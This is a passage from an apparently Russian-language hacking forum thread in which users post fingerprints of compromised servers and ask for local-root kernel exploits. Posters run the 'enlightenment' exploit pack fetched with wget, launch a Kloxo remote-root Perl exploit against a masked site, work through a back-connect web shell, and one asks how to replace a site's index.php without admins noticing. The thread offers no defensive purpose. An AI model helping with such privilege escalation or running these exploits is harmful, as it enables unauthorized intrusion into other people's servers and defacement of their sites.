none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)

$ df -h
Filesystem Size Used Avail Use% Mounted on
/dev/md2 1016G 359G 607G 38% /
/dev/md1 496M 117M 355M 25% /boot
/dev/md3 1.8T 87G 1.6T 6% /home

$ cat /etc/issue
CentOS release 6.4 (Final)
Kernel \r on an \m

$ cat /proc/version
Linux version 2.6.32-279.14.1.el6.x86_64 (mockbuild@c6b8.bsys.dev.centos.org) (gcc version 4.4.6 20120305 (Red Hat 4.4.6-4) (GCC) ) #1 SMP Tue Nov 6 23:43:09 UTC 2012

$ cat /proc/sys/vm/mmap_min_addr
4096

$ ls -la /usr/bin/staprun
---s--x--- 1 root stapusr 162584 Feb 22 2013 /usr/bin/staprun

YaBtr

12.12.2013, 12:23

er9j6@, что ты пробовал? Какие были ошибки?

CVE-2013-2094 Linux 2.6.32/2.6.37 - 3.8.10 PERF_EVENTS local root x86_64 (и x86) (https://rdot.org/forum/showthread.php?t=2720)

multichat

13.12.2013, 12:20

Linux webserver 2.6.26-2-amd64 #1 SMP Thu Nov 5 02:23:12 UTC 2009 x86_64

как сделать так чтобы незаметно можно было бы поменять индекс.пхп в корне папки (на которой неудается поменять права на 0777 ) ?

Какой експлоит нужен и как именно это зделать? Переискал вес инет нигде толком нету инфы .

Netcat лучше неиспользовать так как палиться сразу админами . Сайт Миллионик нехочеться потерять .

короче : какой експлоит нужен , где скачать , как и где его запустить и зделать так чтобы было бы незаметно? )

спасибо )

multichat

13.12.2013, 12:38

запустил на сервере enlightment КУДА ПИСАТь ВЫБОР СПЛОИТА? 0 , 1 , 2 ??

Code:
$ wget http://www.grsecurity.net/~spender/exploits/enlightenment.tgz && tar -zxf enlightenment.tgz && cd enlightenment && ./run_null_exploits.sh
Compiling exp_abacus.c...OK.
Compiling exp_cheddarbay.c...OK.
Compiling exp_ingom0wnar.c...OK.
Compiling exp_moosecox.c...OK.
Compiling exp_paokara.c...OK.
Compiling exp_powerglove.c...OK.
Compiling exp_sieve.c...OK.
Compiling exp_therebel.c...OK.
Compiling exp_vmware.c...failed.
Compiling exp_wunderbar.c...OK.
[+] MAPPED ZERO PAGE!
Choose your exploit:
[0] Cheddar Bay: Linux 2.6.30/2.6.30.1 /dev/net/tun local root
[1] MooseCox: Linux 2.6.31.1 eCryptfs local root
[3] Powerglove: Linux 2.6.31 perf_counter local root
[4] The Rebel: Linux ------------------------------------------------------------------------------
The work of an intellectual is not to mould the political will of others; it
is, through the analyses that he does in his own field, to re-examine
evidence and assumptions, to shake up habitual ways of working and thinking,
to dissipate conventional familiarities, to re-evaluate rules and
institutions and to participate in the formation of a political will (where
he has his role as citizen to play). --Foucault
------------------------------------------------------------------------------
[+] Resolved set_fs_root to 0xffffffff802af1ee
[+] Resolved set_fs_pwd to 0xffffffff802af18e
Unable to acquire kernel symbols. Copy the appropriate System.map to the current directory.

goodmaer

20.12.2013, 17:49

FreeBSD 6.4-STABLE FreeBSD 6.4-STABLE #1: Wed Oct 5 16:08:37 MSD 2011

http://www.exploit-db.com/exploits/16951/

Пробьет?может кто скомпилировать?

goodmaer

22.12.2013, 03:44

Как компилить сплоиты если нет gcc?

Unknown

22.12.2013, 06:01

goodmaer

Зависит от сплоита, если компилить удаленно, а потом портировать на уязвимую тачку и использовать, то могут потребоваться самые различные манипуляции(например, position-independent или static). Ну и разумеется, иметь схожий образ системы крайне желательно. И вообще, тот сплоит, что ты привел выше требует скомпиленное с нетграфами ядро, а это явление нечастое.

Unknown

26.01.2014, 12:42

Linux 2.6.32-39-generic #86-Ubuntu SMP Mon Feb 13 21:47:32 UTC 2012 i686

Ядру почти 2 года, но так ничего под него я и не нашел, может кто-то что-то подскажет.

hakwar

15.02.2014, 20:59

Подскажите эксплойт под

Linux 2.6.32-042stab081.5 #1 SMP Mon Sep 30 16:52:24 MSK 2013 x86_64 x86_64 x86_64 GNU/Linux

Unknown

16.03.2014, 08:00

Дополнение - на сервере нашлось некоторое количество файлов с 0777 правами за владением root/wheel. Я попробовал заменить содержимое на банальный "sudo что-нить" и запустить, но выдает sudo: sorry, you must have a tty to run sudo (работаю под веб шеллом с back-connect, подключиться по ssh похоже что никак).

Эти файлы как-то все же могут помочь в повышении прав?

BuG_4F

19.03.2014, 16:45

Помогите пожалуйста получить рут на этом сервере:

cat /proc/version

Linux version 2.6.32-5-openvz-amd64 (Debian 2.6.32-46) (dannf@debian.org) (gcc version 4.3.5 (Debian 4.3.5-4) ) #1 SMP Sun Sep 23 11:32:18 UTC 2012

ls -la /boot

total 8
drwxr-xr-x 2 root root 4096 May 1 2012 .
drwxr-xr-x 20 root root 4096 Feb 24 15:03 ..

mount

tmpfs on /lib/init/rw type tmpfs (rw,nosuid,mode=0755)
proc on /proc type proc (rw,noexec,nosuid,nodev)
sysfs on /sys type sysfs (rw,noexec,nosuid,nodev)
tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev)
devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=620)
/dev/simfs on / type simfs (rw,relatime)

cat /proc/sys/vm/mmap_min_addr

65536

lion_art

12.04.2014, 00:11

Уважаемые!! Крайне необходимо!!! или иными словами Хелп!

$ uname -a

Linux www 2.6.32-5-amd64 #1 SMP Sun Sep 23 10:07:46 UTC 2012 x86_64 GNU/Linux

$ mount

/dev/xvda1 on / type ext3 (rw,errors=remount-ro)

tmpfs on /lib/init/rw type tmpfs (rw,nosuid,mode=0755)

proc on /proc type proc (rw,noexec,nosuid,nodev)

sysfs on /sys type sysfs (rw,noexec,nosuid,nodev)

udev on /dev type tmpfs (rw,mode=0755)

tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev)

devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=620)

none on /proc/xen type xenfs (rw)

$ cat /proc/version

Linux version 2.6.32-5-amd64 (Debian 2.6.32-46) (dannf@debian.org)

(gcc version 4.3.5 (Debian 4.3.5-4) ) #1 SMP Sun Sep 23 10:07:46 UTC 2012

$ ls -la /boot

total 13236

drwxr-xr-x 3 root root 4096 Feb 12 2013 .

drwxr-xr-x 21 root root 4096 Feb 12 2013 ..

-rw-r--r-- 1 root root 1666397 Sep 23 2012 System.map-2.6.32-5-amd64

-rw-r--r-- 1 root root 106172 Sep 23 2012 config-2.6.32-5-amd64

drwxr-xr-x 3 root root 4096 Feb 12 2013 grub

-rw-r--r-- 1 root root 9310575 Feb 12 2013 initrd.img-2.6.32-5-amd64

-rw-r--r-- 1 root root 2423968 Sep 23 2012 vmlinuz-2.6.32-5-amd64

$ df -h

Filesystem Size Used Avail Use% Mounted on

/dev/xvda1 34G 30G 1.8G 95% /

tmpfs 1003M 0 1003M 0% /lib/init/rw

udev 990M 72K 989M 1% /dev

tmpfs 1003M 0 1003M 0% /dev/shm

$ cat /etc/issue

Debian GNU/Linux 6.0 \n \l

$ cat /etc/crontab

# /etc/crontab: system-wide crontab

# Unlike any other crontab you don't have to run the `crontab'

# command to install the new version when you edit this file

# and files in /etc/cron.d. These files also have username fields,

# that none of the other crontabs do.

SHELL=/bin/sh

PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command

17 * * * * root cd / && run-parts --report /etc/cron.hourly

25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )

47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )

52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )

#

# **** backup:

00 03 * * * root /usr/local/etc/wwwbackup/makebackup

vasykas

26.05.2014, 22:30

Получить рута

Всем привет...

Пытаюсь получить рута этим сплоитом

Code:
Kloxo remote root exploit
uname -a:
2.6.18-308.el5 #1 SMP Tue Feb 21 20:06:06 EST 2012 x86_64 x86_64 x86_64 GNU/Linux

прописываю:

perl morxkloxo.pl http://****.com:7778 **.**.**.** 20845

с начало вроде идет а потом:

TERM environment variable not set.
--- Kloxo remote root exploit --- By: Simo Ben youssef ---
MorXploit Research www.MorXploit.com
MorXploiting http://***.com:7778
It might take a little while, so sit your ass down and relax
[-] Doesn't seem like http://***.com:7778 is running kloxo

В гугле ни чего не нашел..

кто то может сталкивался с этой проблемой, помогите...

Спасибо

PurePass777

22.06.2014, 17:40

Вообщем ситуация такая, есть некая система:

Code:
sh-3.00$ uname -a
Linux linuxcpXXXXXX.XX.net 2.6.9-89.33.1.ELhugemem #1 SMP Mon Nov 15 18:55:19 EST 2010 i686 i686 i386 GNU/Linux

sh-3.00$ id
uid=99(nobody) gid=99(nobody) groups=99(nobody)

sh-3.00$ ls -la /boot
total 9388
drwxr-xr-x 3 root root 4096 Dec 13 2010 .
drwxr-xr-x 31 root root 4096 Jun 21 22:05 ..
-rw-r--r-- 1 root root 512 Jun 29 2009 boot.6800
-rw-r--r-- 1 root root 5824 Nov 15 2004 boot.b
-rw-r--r-- 1 root root 612 Nov 15 2004 chain.b
-rw-r--r-- 1 root root 51219 Nov 15 2010 config-2.6.9-89.33.1.ELhugemem
-rw-r--r-- 1 root root 51183 Apr 20 2009 config-2.6.9-89.ELhugemem
-rw-r--r-- 1 root root 51234 Apr 20 2009 config-2.6.9-89.ELsmp
drwxr-xr-x 2 root root 4096 Dec 13 2010 grub
-rw-r--r-- 1 root root 739274 Dec 13 2010 initrd-2.6.9-89.33.1.ELhugemem.img
-rw-r--r-- 1 root root 736665 Jun 29 2009 initrd-2.6.9-89.ELhugemem.img
-rw-r--r-- 1 root root 740492 Jun 29 2009 initrd-2.6.9-89.ELsmp.img
-rw------- 1 root root 96768 Dec 13 2010 map
-rw-r--r-- 1 root root 23108 Aug 3 2005 message
-rw-r--r-- 1 root root 21282 Aug 3 2005 message.ja
-rw-r--r-- 1 root root 640 Nov 15 2004 os2_d.b
-rw-r--r-- 1 root root 68442 Nov 15 2010 symvers-2.6.9-89.33.1.ELhugemem.gz
-rw-r--r-- 1 root root 68337 Apr 20 2009 symvers-2.6.9-89.ELhugemem.gz
-rw-r--r-- 1 root root 68382 Apr 20 2009 symvers-2.6.9-89.ELsmp.gz
-rw-r--r-- 1 root root 785852 Nov 15 2010 System.map-2.6.9-89.33.1.ELhugemem
-rw-r--r-- 1 root root 785288 Apr 20 2009 System.map-2.6.9-89.ELhugemem
-rw-r--r-- 1 root root 785489 Apr 20 2009 System.map-2.6.9-89.ELsmp
-rw-r--r-- 1 root root 1452843 Nov 15 2010 vmlinuz-2.6.9-89.33.1.ELhugemem
-rw-r--r-- 1 root root 1452279 Apr 20 2009 vmlinuz-2.6.9-89.ELhugemem
-rw-r--r-- 1 root root 1472335 Apr 20 2009 vmlinuz-2.6.9-89.ELsmp

sh-3.00$ ls -la --full-time /lib/lib*
lrwxrwxrwx 1 root root 11 2009-06-29 05:03:58.000000000 -0400 /lib/libacl.so -> libacl.so.1
lrwxrwxrwx 1 root root 15 2009-06-29 04:57:54.000000000 -0400 /lib/libacl.so.1 -> libacl.so.1.1.0
-rwxr-xr-x 1 root root 22164 2007-11-30 09:31:58.000000000 -0500 /lib/libacl.so.1.1.0
-rwxr-xr-x 1 root root 14980 2012-01-26 18:10:43.000000000 -0500 /lib/libanl-2.3.4.so
lrwxrwxrwx 1 root root 15 2012-02-14 05:35:05.000000000 -0500 /lib/libanl.so.1 -> libanl-2.3.4.so
lrwxrwxrwx 1 root root 18 2009-06-29 05:00:45.000000000 -0400 /lib/libasound.so.2 -> libasound.so.2.0.0
-rwxr-xr-x 1 root root 686604 2005-01-10 05:09:50.000000000 -0500 /lib/libasound.so.2.0.0
lrwxrwxrwx 1 root root 12 2009-06-29 05:03:58.000000000 -0400 /lib/libattr.so -> libattr.so.1
lrwxrwxrwx 1 root root 16 2009-06-29 04:57:53.000000000 -0400 /lib/libattr.so.1 -> libattr.so.1.1.0
-rwxr-xr-x 1 root root 30899 2007-01-24 08:13:32.000000000 -0500 /lib/libattr.so.1.1.0
lrwxrwxrwx 1 root root 17 2010-02-03 05:34:15.000000000 -0500 /lib/libaudit.so.0 -> libaudit.so.0.0.0
-rwxr-xr-x 1 root root 60140 2010-01-20 16:07:03.000000000 -0500 /lib/libaudit.so.0.0.0
lrwxrwxrwx 1 root root 15 2009-06-29 05:39:37.000000000 -0400 /lib/libblkid.so.1 -> libblkid.so.1.0
-rwxr-xr-x 1 root root 25196 2009-01-27 11:36:42.000000000 -0500 /lib/libblkid.so.1.0
-rwxr-xr-x 1 root root 8320 2012-01-26 18:10:43.000000000 -0500 /lib/libBrokenLocale-2.3.4.so
lrwxrwxrwx 1 root root 24 2012-02-14 05:35:05.000000000 -0500 /lib/libBrokenLocale.so.1 -> libBrokenLocale-2.3.4.so
-rwxr-xr-x 1 root root 1535392 2012-01-26 18:10:44.000000000 -0500 /lib/libc-2.3.4.so
lrwxrwxrwx 1 root root 11 2009-06-29 05:03:59.000000000 -0400 /lib/libcap.so -> libcap.so.1
lrwxrwxrwx 1 root root 14 2009-06-29 04:57:54.000000000 -0400 /lib/libcap.so.1 -> libcap.so.1.10
-rwxr-xr-x 1 root root 11788 2004-08-31 12:40:55.000000000 -0400 /lib/libcap.so.1.10
-rwxr-xr-x 1 root root 192392 2012-01-26 18:10:44.000000000 -0500 /lib/libcidn-2.3.4.so
lrwxrwxrwx 1 root root 16 2012-02-14 05:35:05.000000000 -0500 /lib/libcidn.so.1 -> libcidn-2.3.4.so
lrwxrwxrwx 1 root root 17 2009-06-29 05:39:37.000000000 -0400 /lib/libcom_err.so.2 -> libcom_err.so.2.1
-rwxr-xr-x 1 root root 7004 2009-01-27 11:36:42.000000000 -0500 /lib/libcom_err.so.2.1
-rwxr-xr-x 1 root root 41956 2012-01-26 18:10:44.000000000 -0500 /lib/libcrypt-2.3.4.so
lrwxrwxrwx 1 root root 19 2009-06-30 08:06:53.000000000 -0400 /lib/libcrypto.so.0 -> libcrypto.so.0.9.6b
-rwxr-xr-x 1 root root 824272 2010-03-19 06:33:54.000000000 -0400 /lib/libcrypto.so.0.9.6b
-rwxr-xr-x 1 root root 945152 2012-01-27 18:27:42.000000000 -0500 /lib/libcrypto.so.0.9.7a
lrwxrwxrwx 1 root root 19 2009-06-29 05:06:01.000000000 -0400 /lib/libcrypto.so.2 -> libcrypto.so.0.9.6b
lrwxrwxrwx 1 root root 19 2009-06-29 04:58:26.000000000 -0400 /lib/libcrypto.so.4 -> libcrypto.so.0.9.7a
lrwxrwxrwx 1 root root 17 2012-02-14 05:35:05.000000000 -0500 /lib/libcrypt.so.1 -> libcrypt-2.3.4.so
lrwxrwxrwx 1 root root 13 2012-02-14 05:35:05.000000000 -0500 /lib/libc.so.6 -> libc-2.3.4.so
-rwxr-xr-x 1 root root 251476 2004-11-30 12:40:09.000000000 -0500 /lib/libdb2.so.3
-rwxr-xr-x 1 root root 614112 2004-11-30 12:40:09.000000000 -0500 /lib/libdb-3.3.so
-rwxr-xr-x 1 root root 762496 2004-11-30 12:40:09.000000000 -0500 /lib/libdb-4.1.so
-rwxr-xr-x 1 root root 843984 2007-06-06 08:37:18.000000000 -0400 /lib/libdb-4.2.so
lrwxrwxrwx 1 root root 11 2009-06-29 05:03:48.000000000 -0400 /lib/libdb.so.3 -> libdb2.so.3
lrwxrwxrwx 1 root root 19 2011-07-13 05:35:53.000000000 -0400 /lib/libdevmapper.a -> libdevmapper.a.1.02
-r-xr-xr-x 1 root root 314298 2010-03-04 15:49:06.000000000 -0500 /lib/libdevmapper.a.1.02
lrwxrwxrwx 1 root root 25 2011-07-13 05:35:53.000000000 -0400 /lib/libdevmapper-event.a -> libdevmapper-event.a.1.02
-r-xr-xr-x 1 root root 33684 2010-03-04 15:49:06.000000000 -0500 /lib/libdevmapper-event.a.1.02
lrwxrwxrwx 1 root root 37 2011-08-19 05:34:10.000000000 -0400 /lib/libdevmapper-event-lvm2mirror.so -> libdevmapper-event-lvm2mirror.so.2.02
-r-xr-xr-x 1 root root 7596 2011-08-03 13:00:49.000000000 -0400 /lib/libdevmapper-event-lvm2mirror.so.2.02
lrwxrwxrwx 1 root root 39 2011-08-19 05:34:10.000000000 -0400 /lib/libdevmapper-event-lvm2snapshot.so -> libdevmapper-event-lvm2snapshot.so.2.02
-r-xr-xr-x 1 root root 6016 2011-08-03 13:00:48.000000000 -0400 /lib/libdevmapper-event-lvm2snapshot.so.2.02
lrwxrwxrwx 1 root root 26 2011-07-13 05:35:53.000000000 -0400 /lib/libdevmapper-event.so -> libdevmapper-event.so.1.02
-r-xr-xr-x 1 root root 14852 2010-03-04 15:49:06.000000000 -0500 /lib/libdevmapper-event.so.1.02
lrwxrwxrwx 1 root root 20 2011-07-13 05:35:53.000000000 -0400 /lib/libdevmapper.so -> libdevmapper.so.1.02
-r-xr-xr-x 1 root root 24140 2010-03-04 15:49:06.000000000 -0500 /lib/libdevmapper.so.1.00
-r-xr-xr-x 1 root root 25196 2010-03-04 15:49:06.000000000 -0500 /lib/libdevmapper.so.1.01
-r-xr-xr-x 1 root root 84280 2010-03-04 15:49:06.000000000 -0500 /lib/libdevmapper.so.1.02
-rwxr-xr-x 1 root root 16748 2012-01-26 18:10:44.000000000 -0500 /lib/libdl-2.3.4.so
lrwxrwxrwx 1 root root 14 2012-02-14 05:35:05.000000000 -0500 /lib/libdl.so.2 -> libdl-2.3.4.so
lrwxrwxrwx 1 root root 13 2009-06-29 05:39:37.000000000 -0400 /lib/libe2p.so.2 -> libe2p.so.2.3
-rwxr-xr-x 1 root root 19824 2009-01-27 11:36:42.000000000 -0500 /lib/libe2p.so.2.3
lrwxrwxrwx 1 root root 16 2009-06-29 05:39:37.000000000 -0400 /lib/libext2fs.so.2 -> libext2fs.so.2.4
-rwxr-xr-x 1 root root 92532 2009-01-27 11:36:42.000000000 -0500 /lib/libext2fs.so.2.4
-rwxr-xr-x 1 root root 40108 2009-12-10 07:28:13.000000000 -0500 /lib/libgcc_s-3.4.6-20060404.so.1
lrwxrwxrwx 1 root root 28 2010-01-14 05:35:14.000000000 -0500 /lib/libgcc_s.so.1 -> libgcc_s-3.4.6-20060404.so.1
-rwxr-xr-x 1 root root 23416 2006-05-04 14:57:03.000000000 -0400 /lib/libiw.so.27
-rwxr-xr-x 1 root root 25880 2006-05-04 14:57:03.000000000 -0400 /lib/libiw.so.28
-rwxr-xr-x 1 root root 6952 2005-12-05 10:43:35.000000000 -0500 /lib/libkeyutils-1.0.2.so
lrwxrwxrwx 1 root root 20 2009-06-29 04:57:53.000000000 -0400 /lib/libkeyutils.so.1 -> libkeyutils-1.0.2.so
-rwxr-xr-x 1 root root 33040 2004-11-30 12:40:09.000000000 -0500 /lib/liblohedr.a
-rwxr-xr-x 1 root root 212164 2012-01-26 18:10:44.000000000 -0500 /lib/libm-2.3.4.so
lrwxrwxrwx 1 root root 13 2012-02-14 05:35:06.000000000 -0500 /lib/libm.so.6 -> libm-2.3.4.so
-rwxr-xr-x 1 root root 8476 2012-01-26 18:10:43.000000000 -0500 /lib/libNoVersion-2.3.4.so
lrwxrwxrwx 1 root root 21 2012-02-14 05:35:05.000000000 -0500 /lib/libNoVersion.so.1 -> libNoVersion-2.3.4.so
-rwxr-xr-x 1 root root 101748 2012-01-26 18:10:44.000000000 -0500 /lib/libnsl-2.3.4.so
lrwxrwxrwx 1 root root 15 2012-02-14 05:35:06.000000000 -0500 /lib/libnsl.so.1 -> libnsl-2.3.4.so
-rwxr-xr-x 1 root root 35788 2012-01-26 18:10:44.000000000 -0500 /lib/libnss1_compat-2.3.4.so
lrwxrwxrwx 1 root root 23 2012-02-14 05:35:06.000000000 -0500 /lib/libnss1_compat.so.1 -> libnss1_compat-2.3.4.so
-rwxr-xr-x 1 root root 17960 2012-01-26 18:10:44.000000000 -0500 /lib/libnss1_dns-2.3.4.so
lrwxrwxrwx 1 root root 20 2012-02-14 05:35:06.000000000 -0500 /lib/libnss1_dns.so.1 -> libnss1_dns-2.3.4.so
-rwxr-xr-x 1 root root 42616 2012-01-26 18:10:44.000000000 -0500 /lib/libnss1_files-2.3.4.so
lrwxrwxrwx 1 root root 22 2012-02-14 05:35:06.000000000 -0500 /lib/libnss1_files.so.1 -> libnss1_files-2.3.4.so
-rwxr-xr-x 1 root root 39228 2012-01-26 18:10:44.000000000 -0500 /lib/libnss1_nis-2.3.4.so
lrwxrwxrwx 1 root root 20 2012-02-14 05:35:06.000000000 -0500 /lib/libnss1_nis.so.1 -> libnss1_nis-2.3.4.so
-rwxr-xr-x 1 root root 40812 2012-01-26 18:10:44.000000000 -0500 /lib/libnss_compat-2.3.4.so
lrwxrwxrwx 1 root root 19 2012-02-14 05:35:06.000000000 -0500 /lib/libnss_compat.so.1 -> libnss1_compat.so.1
lrwxrwxrwx 1 root root 22 2012-02-14 05:35:06.000000000 -0500 /lib/libnss_compat.so.2 -> libnss_compat-2.3.4.so
lrwxrwxrwx 1 root root 18 2009-06-29 04:59:47.000000000 -0400 /lib/libnss_db.so.2 -> libnss_db.so.2.0.0
-rwxr-xr-x 1 root root 548068 2004-10-20 16:11:53.000000000 -0400 /lib/libnss_db.so.2.0.0
-rwxr-xr-x 1 root root 22616 2012-01-26 18:10:44.000000000 -0500 /lib/libnss_dns-2.3.4.so
lrwxrwxrwx 1 root root 16 2012-02-14 05:35:06.000000000 -0500 /lib/libnss_dns.so.1 -> libnss1_dns.so.1
lrwxrwxrwx 1 root root 19 2012-02-14 05:35:06.000000000 -0500 /lib/libnss_dns.so.2 -> libnss_dns-2.3.4.so
-rwxr-xr-x 1 root root 47420 2012-01-26 18:10:44.000000000 -0500 /lib/libnss_files-2.3.4.so
lrwxrwxrwx 1 root root 18 2012-02-14 05:35:06.000000000 -0500 /lib/libnss_files.so.1 -> libnss1_files.so.1
lrwxrwxrwx 1 root root 21 2012-02-14 05:35:06.000000000 -0500 /lib/libnss_files.so.2 -> libnss_files-2.3.4.so
-rwxr-xr-x 1 root root 23464 2012-01-26 18:10:44.000000000 -0500 /lib/libnss_hesiod-2.3.4.so
lrwxrwxrwx 1 root root 22 2012-02-14 05:35:06.000000000 -0500 /lib/libnss_hesiod.so.2 -> libnss_hesiod-2.3.4.so
-rwxr-xr-x 1 root root 2309964 2010-11-10 14:41:57.000000000 -0500 /lib/libnss_ldap-2.3.4.so
lrwxrwxrwx 1 root root 20 2009-06-29 05:00:23.000000000 -0400 /lib/libnss_ldap.so.2 -> libnss_ldap-2.3.4.so
-rwxr-xr-x 1 root root 43036 2012-01-26 18:10:44.000000000 -0500 /lib/libnss_nis-2.3.4.so
-rwxr-xr-x 1 root root 56320 2012-01-26 18:10:44.000000000 -0500 /lib/libnss_nisplus-2.3.4.so
lrwxrwxrwx 1 root root 23 2012-02-14 05:35:06.000000000 -0500 /lib/libnss_nisplus.so.2 -> libnss_nisplus-2.3.4.so
lrwxrwxrwx 1 root root 16 2012-02-14 05:35:06.000000000 -0500 /lib/libnss_nis.so.1 -> libnss1_nis.so.1
lrwxrwxrwx 1 root root 19 2012-02-14 05:35:06.000000000 -0500 /lib/libnss_nis.so.2 -> libnss_nis-2.3.4.so
-rwxr-xr-x 1 root root 16076 2012-02-22 07:19:42.000000000 -0500 /lib/libnss_winbind.so.2
-rwxr-xr-x 1 root root 845988 2012-02-22 07:19:42.000000000 -0500 /lib/libnss_wins.so.2
lrwxrwxrwx 1 root root 15 2009-06-29 04:58:40.000000000 -0400 /lib/libpamc.so.0 -> libpamc.so.0.77
-rwxr-xr-x 1 root root 9108 2010-05-26 14:41:01.000000000 -0400 /lib/libpamc.so.0.77
lrwxrwxrwx 1 root root 19 2009-06-29 04:58:40.000000000 -0400 /lib/libpam_misc.so.0 -> libpam_misc.so.0.77
-rwxr-xr-x 1 root root 9524 2010-05-26 14:41:01.000000000 -0400 /lib/libpam_misc.so.0.77
lrwxrwxrwx 1 root root 14 2009-06-29 04:58:40.000000000 -0400 /lib/libpam.so.0 -> libpam.so.0.77
-rwxr-xr-x 1 root root 32184 2010-05-26 14:41:01.000000000 -0400 /lib/libpam.so.0.77
lrwxrwxrwx 1 root root 16 2009-06-29 04:58:04.000000000 -0400 /lib/libpcre.so.0 -> libpcre.so.0.0.1
-rwxr-xr-x 1 root root 65560 2007-11-28 09:26:55.000000000 -0500 /lib/libpcre.so.0.0.1
-rwxr-xr-x 1 root root 47892 2010-08-17 09:16:59.000000000 -0400 /lib/libproc-3.2.3.so
-rwxr-xr-x 1 root root 95380 2012-01-26 18:10:44.000000000 -0500 /lib/libpthread-0.10.so
lrwxrwxrwx 1 root root 18 2012-02-14 05:35:06.000000000 -0500 /lib/libpthread.so.0 -> libpthread-0.10.so
-rwxr-xr-x 1 root root 81140 2012-01-26 18:10:44.000000000 -0500 /lib/libresolv-2.3.4.so
lrwxrwxrwx 1 root root 18 2012-02-14 05:35:06.000000000 -0500 /lib/libresolv.so.2 -> libresolv-2.3.4.so
-rwxr-xr-x 1 root root 47692 2012-01-26 18:10:44.000000000 -0500 /lib/librt-2.3.4.so
lrwxrwxrwx 1 root root 14 2012-02-14 05:35:06.000000000 -0500 /lib/librt.so.1 -> librt-2.3.4.so
-rwxr-xr-x 1 root root 33040 2006-05-04 14:57:03.000000000 -0400 /lib/libsecdev.a
-rwxr-xr-x 1 root root 17400 2012-01-26 18:10:43.000000000 -0500 /lib/libSegFault.so
-rwxr-xr-x 1 root root 56336 2007-07-30 13:52:40.000000000 -0400 /lib/libselinux.so.1
-rwxr-xr-x 1 root root 53736 2004-08-30 11:50:13.000000000 -0400 /lib/libsepol.so.1
lrwxrwxrwx 1 root root 16 2009-06-30 08:06:53.000000000 -0400 /lib/libssl.so.0 -> libssl.so.0.9.6b
-rwxr-xr-x 1 root root 186304 2010-03-19 06:33:54.000000000 -0400 /lib/libssl.so.0.9.6b
-rwxr-xr-x 1 root root 217864 2012-01-27 18:27:42.000000000 -0500 /lib/libssl.so.0.9.7a
lrwxrwxrwx 1 root root 16 2009-06-29 05:06:01.000000000 -0400 /lib/libssl.so.2 -> libssl.so.0.9.6b
lrwxrwxrwx 1 root root 16 2009-06-29 04:58:26.000000000 -0400 /lib/libssl.so.4 -> libssl.so.0.9.7a
lrwxrwxrwx 1 root root 12 2009-06-29 05:39:37.000000000 -0400 /lib/libss.so.2 -> libss.so.2.0
-rwxr-xr-x 1 root root 18468 2009-01-27 11:36:42.000000000 -0500 /lib/libss.so.2.0
lrwxrwxrwx 1 root root 19 2009-06-29 04:57:57.000000000 -0400 /lib/libtermcap.so.2 -> libtermcap.so.2.0.8
-rwxr-xr-x 1 root root 12592 2004-06-15 20:34:46.000000000 -0400 /lib/libtermcap.so.2.0.8
-rwxr-xr-x 1 root root 25744 2012-01-26 18:10:44.000000000 -0500 /lib/libthread_db-1.0.so
lrwxrwxrwx 1 root root 19 2012-02-14 05:35:06.000000000 -0500 /lib/libthread_db.so.1 -> libthread_db-1.0.so
-rwxr-xr-x 1 root root 15860 2012-01-26 18:10:44.000000000 -0500 /lib/libutil-2.3.4.so
lrwxrwxrwx 1 root root 16 2012-02-14 05:35:06.000000000 -0500 /lib/libutil.so.1 -> libutil-2.3.4.so
lrwxrwxrwx 1 root root 14 2009-06-29 05:39:37.000000000 -0400 /lib/libuuid.so.1 -> libuuid.so.1.2
-rwxr-xr-x 1 root root 11296 2009-01-27 11:36:42.000000000 -0500 /lib/libuuid.so.1.2
-rw-r--r-- 1 root root 49558 2009-04-21 07:26:29.000000000 -0400 /lib/libwrap.a
lrwxrwxrwx 1 root root 16 2009-06-29 05:40:01.000000000 -0400 /lib/libwrap.so -> libwrap.so.0.7.6
lrwxrwxrwx 1 root root 16 2009-06-29 05:40:01.000000000 -0400 /lib/libwrap.so.0 -> libwrap.so.0.7.6
-rwxr-xr-x 1 root root 28504 2009-04-21 07:26:29.000000000 -0400 /lib/libwrap.so.0.7.6

sh-3.00$ mount
/dev/cciss/c0d0p1 on / type ext3 (rw,usrquota)
none on /proc type proc (rw)
none on /sys type sysfs (rw)
none on /dev/pts type devpts (rw,gid=5,mode=620)
usbfs on /proc/bus/usb type usbfs (rw)
none on /dev/shm type tmpfs (rw)
none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)
/usr/tmpDSK on /tmp type ext3 (rw,noexec,nosuid,loop=/dev/loop0)
/tmp on /var/tmp type none (rw,noexec,nosuid,bind)

sh-3.00$ df -h
Filesystem Size Used Avail Use% Mounted on
/dev/cciss/c0d0p1 130G 111G 12G 91% /
none 4.0G 0 4.0G 0% /dev/shm
/usr/tmpDSK 485M 15M 446M 4% /tmp
/tmp 485M 15M 446M 4% /var/tmp

sh-3.00$ cat /etc/issue
Red Hat Enterprise Linux ES release 4 (Nahant Update 9)
Kernel \r on an \m

sh-3.00$ cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/

# run-parts
01 * * * * root run-parts /etc/cron.hourly
02 4 * * * root run-parts /etc/cron.daily
22 4 * * 0 root run-parts /etc/cron.weekly
42 4 1 * * root run-parts /etc/cron.monthly
# ntp client moved to cron.daily

sh-3.00$ cat /proc/version
Linux version 2.6.9-89.33.1.ELhugemem (mockbuild@x86-007.build.bos.redhat.com) (gcc version 3.4.6 20060404 (Red Hat 3.4.6-11)) #1 SMP Mon Nov 15 18:55:19 EST 2010

sh-3.00$ cat /proc/sys/vm/mmap_min_addr
0

sh-3.00$ pwd
/tmp

sh-3.00$ ls -la /usr/bin/staprun
---s--x--- 1 root stapusr 56408 Jun 10 2011 /usr/bin/staprun

под неё нашёл такой вот сплоит, по моему мнению он должен сработать, или я ошибаюсь?

http://1337day.com/exploit/17189

* Linux 2.6.18-128.el5

* Linux 2.6.9-89.EL

* Ubuntu 8.10 Linux 2.6.27

*

* For i386 & ppc compile with the command;

* gcc -w -o exploit exploit.c

*

